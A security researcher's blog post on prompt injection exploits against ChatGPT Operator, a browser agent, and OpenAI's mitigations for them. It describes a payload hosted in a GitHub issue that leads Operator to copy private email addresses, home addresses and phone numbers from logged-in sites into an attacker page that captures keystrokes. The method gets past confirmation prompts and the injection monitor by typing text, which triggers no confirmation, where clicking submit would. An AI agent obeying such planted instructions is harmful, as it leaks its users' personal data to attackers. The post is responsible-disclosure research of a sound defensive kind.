ChatGPT Operator: Prompt Injection Exploits & Defenses

Posted on Feb 17, 2025

#aiml #machine learning #threats #prompt injection #llm #exfil

ChatGPT Operator is a research preview agent from OpenAI that lets ChatGPT use a web browser. It uses vision and reasoning abilities to complete tasks like researching topics, booking travel, ordering groceries, or as this post will show, steal your data!

Currently, it’s only available for ChatGPT Pro users. I decided to invest $200 for one month to try it out.

Risks and Threats

OpenAI highlights three risk categories in their Operator System Card:

User might be misaligned (the user asks for a harmful task),
Model might be misaligned (the model makes a harmful mistake), or
Website might be misaligned (the website is adversarial in some way).

If you are familiar with my research, this is how I have been framing prompting threats as well. Here is a screenshot from one of my presentations: johann 37c3 And for reference here is the Chaos Communication Congress talk I did around prompt injection.

Coming back to OpenAI’s take, my only feedback is the potential overuse of the term “misaligned”. It makes it sound less severe, these can be real attacks with serious consequences to confidentiality, integrity and availability – as we will highlight in this post.

It’s great to see OpenAI thinking the same way from a risks and threats perspective, though! This is threat modeling in action.

Mitigations and Defenses

The practical mitigations I observed are multi-layered, and come down to three primary techniques that I encountered while testing:

Mitigation 1: User Monitoring

The user is prompted to “monitor” what Operator is doing, what text it types and buttons it clicks.

must-monitor

It’s unclear for which pages this screen appears, so far, I mostly only tested with Github and Outlook but I assume it’s based on some data classification model that might detect user PII on screen or similar, rather than specific domain names.

Mitigation 2: Inline Confirmation Requests

Within the chat conversation, Operator may ask the user if a certain action should be performed or request clarification.

In above screenshot you can see a complete prompt injection exploit, that hijacked Operator, opened the “Set Status” page, even typed the attacker-controlled text in the status bar, but before it clicks “Set Status”, an in-chat confirmation appears.

It’s worth pointing out, that the very first time I tried this prompt injection exploit with setting the status, the status was actually set without confirmation! But I was not able to reproduce that a second time.

Mitigation 3: Out-of-Band Confirmation Requests

These confirmation requests typically occur when Operator navigates across website boundaries and takes actions spanning complex requests. This is the most intrusive confirmation dialogue, and the user has the option to pause or resume the operation.

Above screenshot shows the most detailed messages I got, it informs the user exactly on what is about to happen and why the dialog appears. However, most of the time the confirmation is a quite generic message that the websites might contain instructions that conflict with Operator’s – making it unclear which website instructions or content might be malicious.

Before this confirmation dialogue appears, there is a noticeable pause —- sometimes quite long, like 20 or more seconds—before displaying the confirmation screen. So, other reasoning processes and validations are probably happening behind the scenes to decide whether to prompt the user for confirmation.

Finally, there are also data structures in the http requests and responses regarding the prompt injection monitor. Meaning that there is a lot of information the APIs are sending to the client regarding the monitor - but I didn’t investigate this in detail.

Trust No AI - Still Holds True

It’s evident that Operator cannot be fully trusted and these mitigations (which are necessary) will prevent creation of autonomous agents. Check out my paper about Prompt Injection and the CIA Triad you haven’t read it yet.

Prompt Injection risks remain the party pooper - which is a real bummer. I think we all would want autonomous systems that can be trusted to do work on our behalf.

It seems not unlikely that we will work with agents in a lot more collaborative way, rather then have them be entirely autonomous.

Related Note: If you are interested in seeing how a similar “computer use” feature by Anthropic Claude can be manipulated into advanced C2-like scenarios, see my post about “ZombAIs”.

Operator: Prompt Injection Exploit Demos

Now, let’s explore a few Operator prompt injection exploits. To demonstrate that the Prompt Injection Monitor can be bypassed by a motivated adversary, I put together a couple of demos that I shared with OpenAI about three weeks ago, since I wanted to make sure they have a heads-up, and can mitigate this technique.

Setup - A Tricky Scenario

The scenario I wanted to focus on involved having Operator navigate to another site where the user is logged in, and then leak data from that site, ideally PII. A basic exploit demo scenario was quickly found by leaking the user’s personal profile information from sites – like email address, home address, and phone number.

During my research, I noticed that Operator follows hyperlinks easily, it seems quite motivated to click on links!

The second thing I observed is that when it submits forms, there is often a confirmation question in the form of an in-context question or even the UI confirmation dialogue described earlier. So, directly asking Operator to click “Update” buttons failed when tried.

Sneaky Data Leakage

However, just typing text hardly ever triggers any confirmations.

Equipped with that knowledge, I created a webpage on a third-party server that sends whatever someone types directly to the server without any need to submit a form or click a button.

In retrospect, it feels a bit dirty having created this. However, it is not uncommon and good for users to understand that just typing info into a website, without hitting a submit button, means that your input can already be snatched by the website

The idea now is to trick Operator to use this page to solve a problem, but in reality, it’s leaking the data.

Connecting the Attack Dots…

In case you are still wondering what the plan is, here’s a brief explanation of the TTP:

We will be hijacking Operator via prompt injection with text on a website
Have it navigate to an authenticated user settings page,
Ask it to copy PII (personal info) from that page and then
Paste/type the info into the sneaky data leakage website described above

To demo this, I tried it with a couple of different pages, The Guardian, YC Hacker News, Booking.com and a few others - and it worked for all of them. The reason I chose this route was because a “Submit” button, more frequently triggered one of the described prompt injection mitigations.

For this explanation, I’ll use the simplest scenario - leaking a user’s YC Hacker News email address that is only accessible to the admin.

Here the info of a demo sentinel account:

Note: This is not a vulnerability in any of the target sites. However, it raises an interesting question which is if websites should be capable of blocking “well-meaning” AI from accessing certain sensitive sites in the first place. Maybe the User-Agent should indicate that the client is an AI Agent?

Now, let’s look at the prompt injection details.

Hosting the Prompt Injection Payload

The prompt injection payload is hosted on GitHub, as a GitHub issue. It’s a realistic scenario for attacks if you ask me. Because strangers can create issues on most GitHub projects – and AI Agents will more and more often be used to read and process GitHub issues.

Here is the GitHub issue that was used:

To simulate a developer interacting with the GitHub issue, I initially just pasted the URL into Operator. It also worked when typing phrases like “Investigate this GitHub issue ” and similar. Depending on the user’s prompt success will differ – this is where it’s important to point out that both attacks and defenses are probabalistic.

Hijacking Operator

Operator eagerly navigates to the GitHub issues and gets busy trying to help. It sees the malicious “combine” tool and, without much hesitation, clicks the link and navigates to the page.

During some tests, it started writing a test message into the textbox, which immediately gets sent to the third-party server.

Now comes the interesting part: Operator goes back to the GitHub issues and now focuses on the main task, which is to navigate the account settings page of news.ycombinator.com, copy out the private email address, and then switch back to the malicious webpage to paste the data—leading to the attacker receiving the information.

Here is a picture that shows some of the key step for YC Hacker News demo:

Operator grabs the user’s email address (which is not public) and pastes it into the data leakage form.

Now the attacker has the data! Wild. Here is an end-to-end video, in case the explanation above was not that clear.

This technique works with different web sites. Here is an example with booking.com, where prompt injection hijacks Operator and leaks user data, incl. address and phone number.

Closely monitoring what actions Operator takes is quite important at the moment, if the browser is authenticated to websites scary things could happen.

Probabilistic Defenses

Although demos at times worked at first try, prompt injections are not 100% reliable - and neither are the defenses. Many of the mitigations act as probabilistic defenses, reducing but not eliminating the risk. These demos are representative, but not comprehensive.

It was observed that mitigations typically trigger at the last moment before a dangerous action is taken, meaning prompt injection is not prevented but the focus is on detecting dangerous actions which seems to emphasize that there is no fix for prompt injection itself. Agents will be like potentially malicious insiders in companies, although for personal useage I haven’t found a good analogy yet.

Implications

This demonstration has several broader implications:

User Privacy and Security
Operator can be tricked into navigating to malicious sites, which highlights phishing risks. Users’ personal data, including sensitive PII, can be inadvertently exposed if adequate safeguards are not consistently mitigated. I would not recommend giving Operator access to sensitive websites, like your primary email account. Consider using separate accounts for experiments, or create accounts specific to a use case.
Server-Side Solution: Additional Privacy and Security Concerns Furthermore, Operator sessions run server-side. This means that technically OpenAI staff have access to all the data that is entered, as well as session cookies and authorization tokens, etc. There is a custom Operator Chrome Extension and a local webservers running on the Operator host ( for instance (http://localhost:8080/events). It is unclear exactly what those endpoints are used for, but some are probably collecting telemetry data. I haven’t found documentation around it.
Designing and Refining Safer AI Agents
It is important to refine these mitigations to reduce the likelihood of bypassing prompt injections. Since my tests also triggered the prompt injection monitor, I waited a few days and tried again. But the monitor had not yet learned about the attack I performed and my retries often worked at first, since the attack payload got further refined on my side the more I learned. As defenses improve, as will attacks. Additionally, I also shared these proof-of-concept scenarios with OpenAI.
Trust in Automated Systems and Open Source
Prompt injection mitigation bypasses like these can erode trust in automated systems if exploited maliciously. Therefore, maintaining and improving transparency in how AI agents validate and protect data seems important. Could something like the prompt injection monitor be opene sourced?

Tests to Have Operator Click the “Update” Buttons - Failed!

I also tried a couple of tests with directly modifying information on sites by asking ChatGPT Operator to click “Update” buttons during prompt injection attacks.

Those tests generally failed and triggered an in-band confirmation request. However, there was one time early in my research when it worked. The scenario that worked involved updating my GitHub account status via prompt injection from a Github Issue. It’s also worth highlighting that some modern apps, do not require clicking update buttons anymore; they just automatically save information.

There is a lot more to explore and test in this space, many possibilities for tricking Operator, from old school UI spoofing tricks, like Clickjacking to modern LLM trickeries there are a lot of possible attack avenues.

Responsible Disclosure

About three weeks ago I provided OpenAI the details of the prompt injection monitor bypasses described in this post, including videos of initial demo exploits with booking.com and theguardian.com. Until about a week ago the demo’s worked quite reliably. However, since the specific attack scenario discussed in this post appear to not work anymore. The details of the mitigation remain unkown.

It is important to highlight that there are, very likely, more bypasses and tricks attackers can leverage to hijack Operator via instructions on websites. So, be careful and keep monitoring what Operator does.

Conclusion

This post explored how ChatGPT Operator can be hijacked through prompt injection exploits on web pages, leading to unauthorized data leakage of personal information.

Operator is a very cool, useful and provides a glimpse into the not so distant future. I just enjoy watching it go explore and work on tasks!

However, by demonstrating real-world exploit scenarios, this post illustrates vulnerabilities of Operator (and other computer use kind of agents). It’s great to see OpenAI’s investments in making the system more trustworthy and secure, even though there is still work to do. It appears that we arrived at the point where it is accepted that prompt injection is not solvable per se, and it requires monitoring of actions and behavior to determine if an agent does something malicous. There is a lot that can go wrong.

Finally, it would be valuable if the prompt injection monitor, or at least parts of it, were open-sourced, or if OpenAI shared more details on their approach. This would allow researchers to evaluate it more effectively and help others learn from OpenAI’s expertise and approach. As AI systems continue to evolve in scale, reasoning and speed, a proactive stance on security will be essential.

Thanks for reading.

– Johann.

Embrace The Red